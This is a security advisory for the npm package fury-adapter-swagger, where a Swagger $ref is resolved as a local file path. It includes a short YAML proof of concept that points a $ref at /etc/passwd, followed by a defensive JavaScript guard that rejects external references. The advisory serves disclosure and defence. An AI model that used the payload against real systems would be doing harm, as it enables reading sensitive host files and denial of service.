Description
fury-adapter-swagger allows arbitrary file read from the system
fury-adapter-swagger from version 0.2.0 up to, but not including, version 0.9.7 resolves a $ref in a Swagger document as a local filesystem path, so a crafted document lets an attacker read arbitrary files from the host on which the parser runs. This can be used to read sensitive data, or to cause a denial of service by pointing the reference at a device such as /dev/zero, which yields an unbounded stream of bytes.
Proof of Concept:
---
swagger: '2.0'
info:
  title: Read local files
  version: '1.0'
paths:
  /foo:
    get:
      responses:
        200:
          description: Some description
          examples:
            text/html:
              example:
                $ref: '/etc/passwd'   # affected versions resolve this as a path on the local filesystem
Recommendation
Upgrade to version 0.9.7 or later.
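The following is an added example and not code from fury-adapter-swagger or from its upstream fix: a pre-parse guard in JavaScript that walks a parsed Swagger 2.0 document, flags every $ref that is not an in-document JSON Pointer (absolute or relative file paths, file:// or http:// URLs, cross-file references such as other.yaml#/...), and a resolver that follows only such local pointers without touching the filesystem. The sample input is the advisory's proof of concept rewritten as a constructed object literal; the function names (findExternalRefs, assertNoExternalRefs, resolveLocalRef) are this example's own. Upgrading to 0.9.7 or later remains the fix; this check is a further layer for code that accepts Swagger documents from untrusted users.

```javascript
// Added example, not fury-adapter-swagger's own code: reject external $refs
// before any $ref-resolving parser sees the document, and resolve the local
// ("#/...") ones against the in-memory object only.

// Constructed input: the advisory's proof-of-concept YAML as a JS object.
const poc = {
  swagger: '2.0',
  info: { title: 'Read local files', version: '1.0' },
  paths: {
    '/foo': {
      get: {
        responses: {
          200: {
            description: 'Some description',
            examples: {
              'text/html': { example: { $ref: '/etc/passwd' } },
            },
          },
        },
      },
    },
  },
};

// RFC 6901 escaping/unescaping for a single JSON Pointer token.
function escapeToken(key) {
  return key.replace(/~/g, '~0').replace(/\//g, '~1');
}

function unescapeToken(token) {
  return token.replace(/~1/g, '/').replace(/~0/g, '~');
}

// Walk the document and record every $ref with the pointer of the object holding it.
function collectRefs(node, pointer = '', out = []) {
  if (Array.isArray(node)) {
    node.forEach((item, i) => collectRefs(item, `${pointer}/${i}`, out));
  } else if (node !== null && typeof node === 'object') {
    for (const [key, value] of Object.entries(node)) {
      if (key === '$ref') {
        out.push({ pointer, ref: value });
      } else {
        collectRefs(value, `${pointer}/${escapeToken(key)}`, out);
      }
    }
  }
  return out;
}

// A $ref is local only if it is "#" followed by zero or more "/token" segments.
// Paths, URLs and "other.yaml#/..." cross-file references all fail this test.
function isLocalRef(ref) {
  return typeof ref === 'string' && /^#(\/[^/]*)*$/.test(ref);
}

// Every $ref that a file- or URL-aware resolver might fetch from outside the document.
function findExternalRefs(doc) {
  return collectRefs(doc).filter(({ ref }) => !isLocalRef(ref));
}

// Throws before any resolution happens if the document carries external refs.
function assertNoExternalRefs(doc) {
  const external = findExternalRefs(doc);
  if (external.length > 0) {
    const list = external.map((e) => `${e.pointer}: ${JSON.stringify(e.ref)}`).join('; ');
    throw new Error(`refusing document with external $ref(s): ${list}`);
  }
  return true;
}

// Resolve a local "#/..." pointer against the in-memory document; never reads files.
function resolveLocalRef(doc, ref) {
  if (!isLocalRef(ref)) {
    throw new Error(`refusing non-local $ref: ${JSON.stringify(ref)}`);
  }
  // "#/a/b" -> ["a", "b"]; a bare "#" -> [] (the whole document).
  const tokens = ref.slice(1).split('/').slice(1).map(unescapeToken);
  let node = doc;
  for (const token of tokens) {
    if (node === null || typeof node !== 'object' ||
        !Object.prototype.hasOwnProperty.call(node, token)) {
      throw new Error(`unresolvable $ref: ${ref}`);
    }
    node = node[token];
  }
  return node;
}

// Stand-alone run: report where the PoC tries to leave the document.
for (const { pointer, ref } of findExternalRefs(poc)) {
  console.log(`external $ref at ${pointer}: ${ref}`);
}
```

Run the guard on the parsed document before handing it to the adapter; for the proof of concept it reports the reference at /paths/~1foo/get/responses/200/examples/text~1html/example and assertNoExternalRefs throws, whereas a document whose only references are of the form #/definitions/... passes and can be resolved with resolveLocalRef.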
References
- https://github.com/apiaryio/fury-adapter-swagger/pull/89
- https://github.com/apiaryio/fury-adapter-swagger/commit/777e2d68f03546a88f3203bbd4725df8b1f662a7
- https://github.com/apiaryio/fury-adapter-swagger/commit/f4407e3a5323bc31123d45dbc93b8417002e4d51#diff-54c345dc104dc19440f9c2482b7883df820e8b9b699fdd8fa07e2773e7197a29
- https://security.snyk.io/vuln/npm:fury-adapter-swagger:20161024
- https://www.npmjs.com/advisories/305
Packages
Name: fury-adapter-swagger
Ecosystem: npm
Affected versions: >= 0.2.0, < 0.9.7
Fixed version: 0.9.7